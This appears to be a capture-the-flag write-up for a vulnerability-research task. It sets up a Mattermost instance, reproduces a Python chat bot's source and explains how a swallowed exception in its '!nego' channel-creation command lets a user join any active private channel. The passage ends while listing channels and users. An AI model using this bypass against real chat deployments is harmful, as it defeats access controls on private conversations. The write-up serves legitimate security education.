Task 6 - Crossing the Channel - (Vulnerability Research)
Description
This high visibility investigation has garnered a lot of agency attention. Due to your success, your team has designated you as the lead for the tasks ahead. Partnering with CNO and CYBERCOM mission elements, you work with operations to collect the persistent data associated with the identified Mattermost instance. Our analysts inform us that it was obtained through a one-time opportunity and we must move quickly as this may hold the key to tracking down our adversary! We have managed to create an account but it only granted us access to one channel. The adversary doesn’t appear to be in that channel.
We will have to figure out how to get into the same channel as the adversary. If we can gain access to their communications, we may uncover further opportunity.
You are tasked with gaining access to the same channel as the target. The only interface that you have is the chat interface in Mattermost!
Downloads:
- Mattermost instance (volumes.tar.gz)
- User login (user.txt)
Prompt:
- Submit a series of commands, one per line, given to the Mattermost server which will allow you to gain access to a channel with the adversary.
This time, we’re given a Mattermost instance, as volumes.tar.gz contains a db folder with the standard Mattermost PostgreSQL database files, and a bot folder that contains a sample Mattermost bot implementation in Python.
We also have a user login in user.txt:
cautiousferret5:NCfYJKXkdyrIterwBefore we look at the bot, let’s set up the Mattermost instance locally so that we can log in with the provided user and explore the application.
Mattermost setup
We don’t need to get too complicated, so let’s just set it up locally on our machine using Docker, following the Mattermost official Docker instructions.
First we clone the provided Docker repository and set up the environment file, using localhost as the domain since we’re running it locally. We also need to downgrade the PostgreSQL version, since db/var/lib/postgresql/data/PG_VERSION contains 13:
git clone https://github.com/mattermost/dockercd docker
cp env.example .envsed -i 's/DOMAIN=.*/DOMAIN=localhost/' .envsed -i 's/POSTGRES_IMAGE_TAG=.*/POSTGRES_IMAGE_TAG=13-alpine/' .envWarning
The default PostgreSQL version in the Mattermost Docker repository at the time of writing is 18-alpine, which removed the /data suffix from the Docker volume path. Since we need to downgrade to PostgreSQL 13, we also need to adjust the volume path accordingly in docker-compose.yml. Open it up and change:
volumes: - ${POSTGRES_DATA_PATH}:/var/lib/postgresql - ${POSTGRES_DATA_PATH}:/var/lib/postgresql/dataNext we copy the volumes folder we extracted into the docker folder, then create the rest of the necessary folders, and set the correct permissions:
cp -r ../volumes .sudo chmod -R 777 ./volumes/dbmkdir -p ./volumes/app/mattermost/{config,data,logs,plugins,client/plugins,bleve-indexes}sudo chown -R 2000:2000 ./volumes/app/mattermostWe can skip all the certificate and nginx steps since we’re running locally, and simply deploy with Docker Compose:
docker compose -f docker-compose.yml -f docker-compose.without-nginx.yml up -dAnd now we can log in with our provided creds and explore the Mattermost instance!

Using our cautiousferret5 account, we can see that we only have access to a public channel on a team called Malware Central:

The bot
Now that we have the Mattermost instance running, let’s look at the bot code in the bot folder. The bot is implemented in Python and uses the mmpy_bot library to interact with the Mattermost API. There are 7 files total:
bot.py: The main bot loader.malware_database.py: An in-memory database for storing some malware and sale information.mmpy_bot_monkeypatch.py: A monkeypatch for themmpy_botlibrary to add an option to plugin commands.plugin_admin.py: A plugin for admin util commands.plugin_managechannel.py: A plugin for managing channel posts.plugin_onboarding.py: A plugin for onboarding new users, mostly just sends a configurable announcement.plugin_sales.py: A plugin for handling sales of malware.
You can expand these to look at each one, but I’ll go over the relevant parts later.
37 collapsed lines
#!/usr/bin/env pythonimport sysfrom loguru import logger
# Set log level based on -v argumentif "-v" in sys.argv: logger.remove() logger.add(sys.stderr, level="DEBUG")else: logger.remove() logger.add(sys.stderr, level="INFO")
import mmpy_bot_monkeypatch # Ensure monkeypatch is applied before any plugin importsfrom mmpy_bot import Bot, Settingsfrom mmpy_bot.plugins import HelpPluginfrom plugin_sales import SalesPluginfrom plugin_onboarding import OnboardingPluginfrom plugin_admin import AdminPluginfrom plugin_managechannel import ManageChannelPluginimport osfrom dotenv import load_dotenv
# Load environment variables from .env fileload_dotenv(os.path.join(os.path.dirname(__file__), '.env'))
bot = Bot( settings=Settings( MATTERMOST_URL = os.environ.get("MATTERMOST_URL", "http://127.0.0.1"), MATTERMOST_PORT = int(os.environ.get("MATTERMOST_PORT", 8065)), BOT_TOKEN = os.environ.get("BOT_TOKEN"), BOT_TEAM = os.environ.get("BOT_TEAM", "test_team"), SSL_VERIFY = os.environ.get("SSL_VERIFY", "False") == "True", RESPOND_CHANNEL_HELP=True, ), plugins=[SalesPlugin(), HelpPlugin(), OnboardingPlugin(),ManageChannelPlugin(),AdminPlugin()],)bot.run()71 collapsed lines
import osimport pickleimport threadingfrom loguru import loggerfrom functools import wraps
DB_FILE = os.path.join(os.path.dirname(__file__), 'malware_db.pkl')
# Decorator to lock all public methodsdef locked_methods(cls): for attr_name, attr in cls.__dict__.items(): if callable(attr) and not attr_name.startswith('_'): @wraps(attr) def locked(self, *args, __attr=attr, **kwargs): with self._lock: return __attr(self, *args, **kwargs) setattr(cls, attr_name, locked) return cls
@locked_methodsclass MalwareDatabase: def __init__(self, db_file=DB_FILE): self.db_file = db_file self._lock = threading.Lock()
def _load_db(self): if not os.path.exists(self.db_file): return {'offerings': [], 'sales': []} with open(self.db_file, 'rb') as f: return pickle.load(f)
def _save_db(self, db): with open(self.db_file, 'wb') as f: pickle.dump(db, f)
def add_offering(self, offering): db = self._load_db() offering['id'] = len(db['offerings']) + 1 logger.debug(f"Adding offering: {offering}") db['offerings'].append(offering) self._save_db(db) logger.info(f"Offering added with ID {offering['id']}") return offering['id']
def get_offerings(self): db = self._load_db() logger.debug(f"Getting offerings: {db['offerings']}") return db['offerings']
def record_sale(self, sale): db = self._load_db() logger.debug(f"Recording sale: {sale}") db['sales'].append(sale) self._save_db(db) logger.info(f"Sale recorded: {sale}")
def get_sales(self): db = self._load_db() logger.debug(f"Getting sales: {db['sales']}") return db['sales']
# Singleton instance for use throughout the bot
db = MalwareDatabase()
# Usage in your plugin:# from malware_database import db# db.add_offering(...)# db.get_offerings()# db.record_sale(...)# db.get_sales()53 collapsed lines
# mmpy_bot_monkeypatch.py"""Monkey patch mmpy_bot MessageFunction to support no_direct option."""from mmpy_bot.function import MessageFunctionfrom mmpy_bot.utils import completed_futureimport fnmatchfrom loguru import logger
# Save original methods_original_init = MessageFunction.__init___original_call = MessageFunction.__call__
def patched_init(self, *args, allowed_users_glob=None, **kwargs): logger.debug(f"patched_init called for {getattr(self, 'name', None)} with allowed_users_glob={allowed_users_glob} and no_direct={kwargs.get('no_direct', False)}") _original_init(self, *args, **kwargs) self.no_direct = kwargs.get('no_direct', False) # allowed_users_glob setup if allowed_users_glob is not None: logger.debug(f"Setting allowed_users_glob: {allowed_users_glob}") self.allowed_users_glob = [pattern.lower() for pattern in allowed_users_glob] elif hasattr(self, 'allowed_users_glob'): logger.debug("allowed_users_glob already set") pass # already set else: self.allowed_users_glob = [] logger.debug("allowed_users_glob set to empty list")
def patched_call(self, message, *args): logger.debug(f"patched_call for {getattr(self, 'name', None)} from sender={message.sender_name}") # If no_direct is set and this is a direct message, skip if getattr(self, 'no_direct', False) and message.is_direct_message: logger.debug("no_direct is set and message is direct, skipping handler") return None if not self.is_coroutine else completed_future() # Combined exact and glob matching for allowed_users sender = message.sender_name.lower() allowed_exact = sender in getattr(self, 'allowed_users', []) allowed_glob = any(fnmatch.fnmatch(sender, pattern) for pattern in getattr(self, 'allowed_users_glob', [])) logger.debug(f"allowed_exact={allowed_exact}, allowed_glob={allowed_glob}, allowed_users={getattr(self, 'allowed_users', [])}, allowed_users_glob={getattr(self, 'allowed_users_glob', [])}") if getattr(self, 'allowed_users', None) or getattr(self, 'allowed_users_glob', None): if not (allowed_exact or allowed_glob): logger.debug(f"Permission denied for sender={sender}") if not getattr(self, 'silence_fail_msg', False): self.plugin.driver.reply_to( message, "You do not have permission to perform this action!" ) return None if not self.is_coroutine else completed_future() else: logger.debug(f"Permission granted for sender={sender}") return _original_call(self, message, *args)
MessageFunction.__init__ = patched_initMessageFunction.__call__ = patched_call29 collapsed lines
from mmpy_bot import Pluginfrom mmpy_bot.scheduler import schedulefrom loguru import loggerfrom malware_database import dbfrom mmpy_bot.function import listen_toimport subprocess
class AdminPlugin(Plugin): """ A plugin to handle administration utilities """
@listen_to("^!util df", allowed_users_glob=["mod_*","admin_*"]) def df_cmd(self, message ): logger.info(f"AdminPlugin: running df") result = subprocess.run(["df", "-h", "-x", "tmpfs"],capture_output=True, text=True) self.driver.reply_to(message, f"{result.stdout}")
@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"]) def uptime_cmd(self, message): logger.info("AdminPlugin: running uptime") result = subprocess.run(["uptime"], capture_output=True, text=True) self.driver.reply_to(message, f"{result.stdout}")
@listen_to("^!util free$", allowed_users_glob=["mod_*","admin_*"]) def free_cmd(self, message): logger.info("AdminPlugin: running free -h") result = subprocess.run(["free", "-h"], capture_output=True, text=True) self.driver.reply_to(message, f"{result.stdout}")46 collapsed lines
from mmpy_bot_monkeypatch import * # Ensure monkeypatch is applied before anything elsefrom mmpy_bot import Plugin, Message, listen_tofrom malware_database import dbfrom loguru import logger
def get_pinned(driver, message: Message, *args): logger.debug(f"handle_get_pinned called with message: {message.text}") team_name = driver.options.get('team', 'malwarecentral') print(f"[DEBUG] Looking up team: {team_name}") # Get team info team = driver.teams.get_team_by_name(team_name) channel_id = message.channel_id posts = driver.channels.get_pinned_posts(channel_id) logger.info(f"found pinned posts {posts}") order= posts["order"] all_pinned ={} for post in order: all_pinned[post] = posts["posts"][post]["message"] logger.info(f"respons is {all_pinned}") return all_pinned
class ManageChannelPlugin(Plugin): """ A plugin to handle Managing Channel Posts """
@listen_to('^!delete nonpinned', no_direct=True,human_description="!delete nonpinned\n\tget rid of any posts that aren't pinned") def handle_delete_nonpinned(self : Plugin, message: Message, *args): all_pinned = get_pinned(self.driver, message) channel_id = message.channel_id posts = self.driver.posts.get_posts_for_channel(channel_id)["order"] logger.info(f"got {len(posts)} posts for this channel") logger.info(posts) logger.info(all_pinned) #loop through every post and delete the ones that aren't pinned count = 0 while (len(posts) > len(all_pinned.items())): for post in posts: if post not in all_pinned: self.driver.posts.delete_post(post) count += 1 posts = self.driver.posts.get_posts_for_channel(channel_id)["order"] logger.info(f"got {len(posts)} posts for this channel")49 collapsed lines
from mmpy_bot import Pluginfrom mmpy_bot.scheduler import schedulefrom loguru import loggerfrom malware_database import dbfrom mmpy_bot.function import listen_to
ANNOUNCEMENT_CHANNEL = "public"ANNOUNCEMENT_RULES = """Welcome to the Malware Marketplace! Please read the rules and stay safe.1. Do not discuss illegal activities2. Do not wreak havoc3. Do not make $$$$4. Don't even consider HACK(ing) THE PLANET5. Always buck authority
Current info and updates will appear here."""ANNOUNCEMENT_MIDDLE = "No current announcements"
class OnboardingPlugin(Plugin): """Plugin to send onboarding/welcome/rules announcements."""
def on_start(self): self.announcement_middle = ANNOUNCEMENT_MIDDLE logger.info(f"PluginOnboarding: Sending initial announcement to {ANNOUNCEMENT_CHANNEL}") self.send_announcement() schedule.every(1).hours.do(self.send_announcement)
@listen_to("^!update_announcement (.+)$", allowed_users_glob=["mod_*"]) def update_announcement_cmd(self, message, new_middle): logger.info(f"PluginOnboarding: Announcement middle updated by {message.sender_name}") self.announcement_middle = new_middle self.send_announcement() self.driver.reply_to(message, "Announcement updated and sent.")
def send_announcement(self): # Get team name from driver options team_name = self.settings.BOT_TEAM # Get channel info by name and team name (works for public/private) channel = self.driver.channels.get_channel_by_name_for_team_name(team_name, ANNOUNCEMENT_CHANNEL) channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id') # Get current offerings offerings = db.get_offerings() offerings_text = "Current Offerings:\n" + "\n".join([ f"ID: {o['id']}, Name: {o['name']}, Type: {o['type']}, OS: {o['os']}, Price: {o['price']}" for o in offerings ]) if offerings else "No current offerings." announcement = f"{ANNOUNCEMENT_RULES}\n\n{self.announcement_middle}\n\n{offerings_text}" logger.debug(f"PluginOnboarding: Sending announcement to channel_id={channel_id}") self.driver.create_post(channel_id=channel_id, message=announcement)212 collapsed lines
from mmpy_bot_monkeypatch import * # Ensure monkeypatch is applied before anything elsefrom mmpy_bot import Plugin, Message, listen_tofrom malware_database import dbfrom loguru import logger
MALWARE_TYPES = ["0click", "1click", "LPE", "SBE", "RCE", "Phishing", "ExploitKit", "Backdoor", "Rootkit"]OS_TYPES = ["Windows", "Linux", "macOS", "Android", "iOS", "Unix"]ODAYS = ["0day", "nday"]
class SalesPlugin(Plugin): """ A plugin to handle sales in Mattermost. """
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!") def handle_nego(self : Plugin, message: Message, *args): logger.debug(f"handle_nego called with message: {message.text}") args = message.text.strip().split() if len(args) != 5: self.driver.reply_to(message, "Usage: !nego channel seller moderator1 moderator2") logger.warning("handle_nego: Incorrect number of arguments") return user1 = message.sender_name _, channel_name, user2, user3, user4 = args[:6] if not user4.startswith('mod_'): self.driver.reply_to(message, f"You must have a mod") return display_name = channel_name team_name = self.driver.options.get('team', 'malwarecentral') print(f"[DEBUG] Looking up team: {team_name}") # Get team info team = self.driver.teams.get_team_by_name(team_name) logger.debug(f"Team API response: {team}") team_id = team.get('id') if isinstance(team, dict) else team.json().get('id') print(f"[DEBUG] team_id: {team_id}") # Create channel channel_options = { "team_id": team_id, "name": channel_name, "display_name": display_name, "type": "P" } logger.debug(f"Creating channel with options: {channel_options}") try: channel = self.driver.channels.create_channel(channel_options) print(f"[DEBUG] Channel API response: {channel}") #hide weird exception when we have an archived channel with the same name, we'll just unarchive it except Exception as e: print(f"[DEBUG] Exception while creating channel: {e}") # Try to unarchive the channel if it exists try: archived_channel = self.driver.channels.get_channel_by_name(channel_name, team_id) if archived_channel and archived_channel.get('delete_at') > 0: logger.info(f"Unarchiving existing channel: {archived_channel}") self.driver.channels.unarchive_channel(archived_channel.get('id')) channel = archived_channel except Exception as e: self.driver.reply_to(message, f"Failed to create or unarchive channel: {e}") #we either created a new channel or unarchived an existing one print(f"[DEBUG] getting channel: {channel_name} in team {team_id}") channel = self.driver.channels.get_channel_by_name(team_id, channel_name) channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id') print(f"[DEBUG] channel_id: {channel_id}") # Get user ids user_ids = [] for uname in [user1, user2, user3, user4]: logger.debug(f"Looking up user: {uname}") user = self.driver.users.get_user_by_username(uname) logger.debug(f"User API response: {user}") uid = user.get('id') if isinstance(user, dict) else user.json().get('id') logger.debug(f"user_id for {uname}: {uid}") if not uid: self.driver.reply_to(message, f"User not found: {uname}") logger.warning(f"handle_nego: User not found: {uname}") return user_ids.append(uid) if len(set(user_ids)) != 4: logger.warning(f"incorrect number of users to run command") self.driver.reply_to(message, f"incorrect number of users to run command") return print(f"[DEBUG] All user_ids: {user_ids}")
# Check if channel already has members existing_members = self.driver.channels.get_channel_members(channel_id) existing_member_user_ids = [member.get('user_id') for member in existing_members] existing_user_ids = any(uid in user_ids for uid in existing_member_user_ids) if existing_user_ids: # If the channel already has members, we should not add them again # This is a safeguard against creating duplicate entries in an archived channel print(f"[DEBUG] Existing members in channel {channel_id}: {existing_member_user_ids}, this shouldn't happen! archived channels should be empty") return # make sure not adding randos current_members_ids = [m['user_id'] for m in self.driver.channels.get_channel_members(message.channel_id)] if not (user_ids[0] in current_members_ids and user_ids[1] in current_members_ids and user_ids[2] in current_members_ids and user_ids[3] in current_members_ids): self.driver.reply_to(message, f"Could not find users") return
# Add users to channel for uid in user_ids: logger.debug(f"Adding user {uid} to channel {channel_id}") self.driver.channels.add_channel_member(channel_id, {"user_id": uid}) self.driver.reply_to(message, f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}") logger.info(f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")
@listen_to('^!add_offering (.*)$', no_direct=True,allowed_users_glob=["mod_*"], human_description="!add_offering name type os oday_or_nday creator price\n\tAdd a new malware offering.") def add_offering_cmd(self, message: Message, *args): args = message.text.strip().split() logger.debug(f"add_offering_cmd called with args: {args}") if len(args) != 7: self.driver.reply_to(message, "Usage: !add_offering name type os oday_or_nday creator price") logger.warning("add_offering: Incorrect number of arguments") return _, name, mtype, osys, oday_nday, creator, price = args mtype_lc = mtype.lower() osys_lc = osys.lower() oday_nday_lc = oday_nday.lower() logger.debug(f"Normalized values: type={mtype_lc}, os={osys_lc}, oday_nday={oday_nday_lc}") if mtype_lc not in [t.lower() for t in MALWARE_TYPES]: self.driver.reply_to(message, f"Invalid malware type. Allowed: {', '.join(MALWARE_TYPES)}") logger.warning(f"add_offering: Invalid malware type '{mtype}'") return if osys_lc not in [o.lower() for o in OS_TYPES]: self.driver.reply_to(message, f"Invalid OS. Allowed: {', '.join(OS_TYPES)}") logger.warning(f"add_offering: Invalid OS '{osys}'") return if oday_nday_lc not in [d.lower() for d in ODAYS]: self.driver.reply_to(message, "oday_or_nday must be '0day' or 'nday'.") logger.warning(f"add_offering: Invalid oday_or_nday '{oday_nday}'") return team_name = self.driver.options.get('team', 'malwarecentral') team = self.driver.teams.get_team_by_name(team_name) team_id = team.get('id') if isinstance(team, dict) else team.json().get('id') user = self.driver.users.get_user_by_username(creator) if not user or (user.get('id') if isinstance(user, dict) else user.json().get('id')) is None: self.driver.reply_to(message, f"Creator '{creator}' is not a valid user in the team.") logger.warning(f"add_offering: Creator '{creator}' is not a valid user in the team.") return try: price_val = float(price) if price_val < 0: raise ValueError except ValueError: self.driver.reply_to(message, "Price must be a positive number.") logger.warning(f"add_offering: Invalid price '{price}'") return offering = { 'name': name, 'type': mtype_lc, 'os': osys_lc, 'oday_or_nday': oday_nday_lc, 'creator': creator, 'price': price_val } logger.info(f"Adding offering: {offering}") oid = db.add_offering(offering) self.driver.reply_to(message, f"Offering added with ID {oid}.") logger.info(f"Offering added with ID {oid}")
@listen_to('^!get_offerings (.*)$', no_direct=True, human_description="!get_offerings\n\tList all malware offerings.") def get_offerings_cmd(self, message: Message, *args): logger.debug(f"get_offerings_cmd called with message: {message.text}") offerings = db.get_offerings() logger.debug(f"Offerings retrieved: {offerings}") if not offerings: self.driver.reply_to(message, "No offerings available.") logger.info("get_offerings_cmd: No offerings available.") return msg = "Malware Offerings:\n" + "\n".join([ f"ID: {o['id']}, Name: {o['name']}, Type: {o['type']}, OS: {o['os']}, Oday/Nday: {o['oday_or_nday']}, Creator: {o['creator']}, Price: {o['price']}" for o in offerings ]) self.driver.reply_to(message, msg) logger.info("get_offerings_cmd: Sent offerings list.")
#TODO update these users to be other admins we expect to be listed within the team @listen_to('^!record_sale (.*)$', no_direct=True, allowed_users_glob=["mod_*"],human_description="!record_sale buyer price offering_id\n\tRecord a sale of malware.",allowed_users=["badguy","otherbadguy","some guys","user1"]) def record_sale_cmd(self, message: Message, *args): logger.debug(f"record_sale_cmd called with message: {message.text}") args = message.text.strip().split() if len(args) != 4: self.driver.reply_to(message, "Usage: !record_sale buyer price offering_id") logger.warning("record_sale_cmd: Incorrect number of arguments") return _, buyer, price, offering_id = args # Validate buyer is a user in the team team_name = self.driver.options.get('team', 'malwarecentral') team = self.driver.teams.get_team_by_name(team_name) team_id = team.get('id') if isinstance(team, dict) else team.json().get('id') user = self.driver.users.get_user_by_username(buyer) if not user or (user.get('id') if isinstance(user, dict) else user.json().get('id')) is None: self.driver.reply_to(message, f"Buyer '{buyer}' is not a valid user in the team.") logger.warning(f"record_sale_cmd: Buyer '{buyer}' is not a valid user in the team.") return # Seller is the creator of the offering offerings = db.get_offerings() offering = next((o for o in offerings if str(o['id']) == offering_id), None) if not offering: self.driver.reply_to(message, f"Offering ID {offering_id} not found.") logger.warning(f"record_sale_cmd: Offering ID {offering_id} not found.") return seller = offering['creator'] sale = { 'buyer': buyer, 'seller': seller, 'price': price, 'offering_id': offering_id } logger.info(f"Recording sale: {sale}") db.record_sale(sale) self.driver.reply_to(message, f"Sale recorded for offering ID {offering_id}.") logger.info(f"Sale recorded for offering ID {offering_id}")The way mmpy_bot works is that it listens for messages in channels and direct messages, and when a message matches a registered command pattern, it calls the corresponding handler function in the plugin.
@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"]) def uptime_cmd(self, message): logger.info("AdminPlugin: running uptime") result = subprocess.run(["uptime"], capture_output=True, text=True) self.driver.reply_to(message, f"{result.stdout}")For example, this command listens for messages that match the regex ^!util uptime$ and are sent by users whose usernames match the glob patterns mod_* or admin_*. When such a message is received, it runs the uptime_cmd function, which executes the uptime command on the server and replies with the output.
Some of the commands also have a no_direct=True option, which means they will not respond to direct messages. This is implemented in the monkeypatch in mmpy_bot_monkeypatch.py.
28 collapsed lines
# mmpy_bot_monkeypatch.py"""Monkey patch mmpy_bot MessageFunction to support no_direct option."""from mmpy_bot.function import MessageFunctionfrom mmpy_bot.utils import completed_futureimport fnmatchfrom loguru import logger
# Save original methods_original_init = MessageFunction.__init___original_call = MessageFunction.__call__
def patched_init(self, *args, allowed_users_glob=None, **kwargs): logger.debug(f"patched_init called for {getattr(self, 'name', None)} with allowed_users_glob={allowed_users_glob} and no_direct={kwargs.get('no_direct', False)}") _original_init(self, *args, **kwargs) self.no_direct = kwargs.get('no_direct', False) # allowed_users_glob setup if allowed_users_glob is not None: logger.debug(f"Setting allowed_users_glob: {allowed_users_glob}") self.allowed_users_glob = [pattern.lower() for pattern in allowed_users_glob] elif hasattr(self, 'allowed_users_glob'): logger.debug("allowed_users_glob already set") pass # already set else: self.allowed_users_glob = [] logger.debug("allowed_users_glob set to empty list")
def patched_call(self, message, *args): logger.debug(f"patched_call for {getattr(self, 'name', None)} from sender={message.sender_name}") # If no_direct is set and this is a direct message, skip if getattr(self, 'no_direct', False) and message.is_direct_message: logger.debug("no_direct is set and message is direct, skipping handler") return None if not self.is_coroutine else completed_future()19 collapsed lines
# Combined exact and glob matching for allowed_users sender = message.sender_name.lower() allowed_exact = sender in getattr(self, 'allowed_users', []) allowed_glob = any(fnmatch.fnmatch(sender, pattern) for pattern in getattr(self, 'allowed_users_glob', [])) logger.debug(f"allowed_exact={allowed_exact}, allowed_glob={allowed_glob}, allowed_users={getattr(self, 'allowed_users', [])}, allowed_users_glob={getattr(self, 'allowed_users_glob', [])}") if getattr(self, 'allowed_users', None) or getattr(self, 'allowed_users_glob', None): if not (allowed_exact or allowed_glob): logger.debug(f"Permission denied for sender={sender}") if not getattr(self, 'silence_fail_msg', False): self.plugin.driver.reply_to( message, "You do not have permission to perform this action!" ) return None if not self.is_coroutine else completed_future() else: logger.debug(f"Permission granted for sender={sender}") return _original_call(self, message, *args)
MessageFunction.__init__ = patched_initMessageFunction.__call__ = patched_callUnfortunately for us, most of the commands have some restrictions that prevent our user, cautiousferret5, from using them. Here’s a list of every command, and if we can use it or not:
# plugin_admin.py
@listen_to("^!util df", allowed_users_glob=["mod_*","admin_*"])@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])@listen_to("^!util free$", allowed_users_glob=["mod_*","admin_*"])
# plugin_managechannel.py
@listen_to('^!delete nonpinned', no_direct=True,human_description="!delete nonpinned\n\tget rid of any posts that aren't pinned")
# plugin_onboarding.py
@listen_to("^!update_announcement (.+)$", allowed_users_glob=["mod_*"])
# plugin_sales.py
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")
@listen_to('^!add_offering (.*)$', no_direct=True,allowed_users_glob=["mod_*"], human_description="!add_offering name type os oday_or_nday creator price\n\tAdd a new malware offering.")
@listen_to('^!get_offerings (.*)$', no_direct=True, human_description="!get_offerings\n\tList all malware offerings.")
@listen_to('^!record_sale (.*)$', no_direct=True, allowed_users_glob=["mod_*"],human_description="!record_sale buyer price offering_id\n\tRecord a sale of malware.",allowed_users=["badguy","otherbadguy","some guys","user1"])From the listed commands, the only one that we can use and adds us to channels is the !nego command in plugin_sales.py. This command allows us to create a negotiation channel with a seller and two moderators.
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")def handle_nego(self : Plugin, message: Message, *args): logger.debug(f"handle_nego called with message: {message.text}") args = message.text.strip().split() if len(args) != 5:3 collapsed lines
self.driver.reply_to(message, "Usage: !nego channel seller moderator1 moderator2") logger.warning("handle_nego: Incorrect number of arguments") return user1 = message.sender_name _, channel_name, user2, user3, user4 = args[:6] if not user4.startswith('mod_'): self.driver.reply_to(message, f"You must have a mod") return19 collapsed lines
display_name = channel_name team_name = self.driver.options.get('team', 'malwarecentral') print(f"[DEBUG] Looking up team: {team_name}") # Get team info team = self.driver.teams.get_team_by_name(team_name) logger.debug(f"Team API response: {team}") team_id = team.get('id') if isinstance(team, dict) else team.json().get('id') print(f"[DEBUG] team_id: {team_id}") # Create channel channel_options = { "team_id": team_id, "name": channel_name, "display_name": display_name, "type": "P" } logger.debug(f"Creating channel with options: {channel_options}") try: channel = self.driver.channels.create_channel(channel_options) print(f"[DEBUG] Channel API response: {channel}") #hide weird exception when we have an archived channel with the same name, we'll just unarchive it except Exception as e: print(f"[DEBUG] Exception while creating channel: {e}") # Try to unarchive the channel if it exists try:5 collapsed lines
archived_channel = self.driver.channels.get_channel_by_name(channel_name, team_id) if archived_channel and archived_channel.get('delete_at') > 0: logger.info(f"Unarchiving existing channel: {archived_channel}") self.driver.channels.unarchive_channel(archived_channel.get('id')) channel = archived_channel except Exception as e: self.driver.reply_to(message, f"Failed to create or unarchive channel: {e}") #we either created a new channel or unarchived an existing one4 collapsed lines
print(f"[DEBUG] getting channel: {channel_name} in team {team_id}") channel = self.driver.channels.get_channel_by_name(team_id, channel_name) channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id') print(f"[DEBUG] channel_id: {channel_id}") # Get user ids user_ids = [] for uname in [user1, user2, user3, user4]:9 collapsed lines
logger.debug(f"Looking up user: {uname}") user = self.driver.users.get_user_by_username(uname) logger.debug(f"User API response: {user}") uid = user.get('id') if isinstance(user, dict) else user.json().get('id') logger.debug(f"user_id for {uname}: {uid}") if not uid: self.driver.reply_to(message, f"User not found: {uname}") logger.warning(f"handle_nego: User not found: {uname}") return user_ids.append(uid) if len(set(user_ids)) != 4: logger.warning(f"incorrect number of users to run command") self.driver.reply_to(message, f"incorrect number of users to run command") return print(f"[DEBUG] All user_ids: {user_ids}")
# Check if channel already has members existing_members = self.driver.channels.get_channel_members(channel_id) existing_member_user_ids = [member.get('user_id') for member in existing_members] existing_user_ids = any(uid in user_ids for uid in existing_member_user_ids) if existing_user_ids: # If the channel already has members, we should not add them again # This is a safeguard against creating duplicate entries in an archived channel print(f"[DEBUG] Existing members in channel {channel_id}: {existing_member_user_ids}, this shouldn't happen! archived channels should be empty") return # make sure not adding randos current_members_ids = [m['user_id'] for m in self.driver.channels.get_channel_members(message.channel_id)] if not (user_ids[0] in current_members_ids and user_ids[1] in current_members_ids and user_ids[2] in current_members_ids and user_ids[3] in current_members_ids): self.driver.reply_to(message, f"Could not find users") return
# Add users to channel5 collapsed lines
for uid in user_ids: logger.debug(f"Adding user {uid} to channel {channel_id}") self.driver.channels.add_channel_member(channel_id, {"user_id": uid}) self.driver.reply_to(message, f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}") logger.info(f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")If you analyze the un-archiving functionality, you’ll realize that if there exists an active channel with the same name, it will first error when trying to create, then it will error again when trying to unarchive. However, this second error just gets caught and the command continues. This means that we can add ourselves to any active channel we know that name of, as long as we can satisfy the other requirements of the command.
Starting from top to bottom, these other requirements are:
- The
user4we provide must start withmod_, meaning they must be a moderator. - We must provide 4 unique users, checked by user IDs.
- None of the users we provide can exist in the requested channel already.
- All 4 users must already be members of the channel where we issue the command.
That’s great, but what channel are we actually trying to access? Let’s go back and look at the Mattermost instance again.
Dumping the Mattermost channels
Using Mattermost’s builtin mmctl CLI tool, we can dump all the channels and users in the instance.
$ docker compose exec mattermost mmctl --local channel list malwarecentralpublicchannel14210 (private)channel15769 (private)channel23011 (private)channel28375 (private)channel36984 (private)channel37915 (private)channel41964 (private)channel42011 (private)channel43502 (private)channel45015 (private)channel46360 (private)channel51816 (private)channel56398 (private)channel60311 (private)channel60871 (private)channel6153 (private)channel62240 (private)channel62739 (private)channel64089 (private)channel76379 (private)channel77848 (private)channel78377 (private)channel91739 (private)
There are 24 channels on local instance$ docker compose exec mattermost mmctl --local user listsqeoydebhtdpxreb36ddc1ztxr: admin_zestysnail91 (admin_zestysnail91@malware.xyz)nccuidn66fngdy3psuoearaacw: alertfish82 (alertfish82@malware.xyz)nmaweowaup8c3cagki3e6q5r5o: bubblyowl66 (bubblyowl66@malware.xyz)4o3okzr34in6xkdmsrahtzxskw: calls (calls@localhost)5uo9s769utfa3m8wjq1hkgmpih: cautiousferret5 (cautiousferret5@malware.xyz)rbtwjkm6hfgy8badbenz8t7fca: cruelbass14 (cruelbass14@malware.xyz)jtqbrh6s7irwjr7jrzokpkfhwa: emptyshads41 (emptyshads41@malware.xyz)nwfsa6s5iig4fyb4w643u8qkga: giddythrushe28 (giddythrushe28@malware.xyz)zxkh7mqq5pre7pkzghwj6uy6ra: insecurebasmati34 (insecurebasmati34@malware.xyz)eidtpjuz8jy3bd5zd3bzhsdjpr: malbot (malbot@localhost)4zdxb76a17fiz8r43gri7ctbwy: mod_aboardhoopoe59 (mod_aboardhoopoe59@malware.xyz)jeswn63kmjb1ixhfmxz4crfewa: mod_affectedeagle51 (mod_affectedeagle51@malware.xyz)bhsh5hnx57fcf8rpud5w8xn8dc: mod_ecstaticcheese60 (mod_ecstaticcheese60@malware.xyz)txjizyhehin67q64wektejoczy: mod_euphoriccoati77 (mod_euphoriccoati77@malware.xyz)r9uhopksxfgy8xz8ifpk5y47wh: mod_murkygatorade10 (mod_murkygatorade10@malware.xyz)1tmkcjt6m3g59kry1pfixqznzr: mod_wingedlion39 (mod_wingedlion39@malware.xyz)jg7ie7kxj3bqjrp3rjb8h5e1kc: morbidcoconut10 (morbidcoconut10@malware.xyz)qufpxm9t9fnjib3satjb5dua1r: playbooks 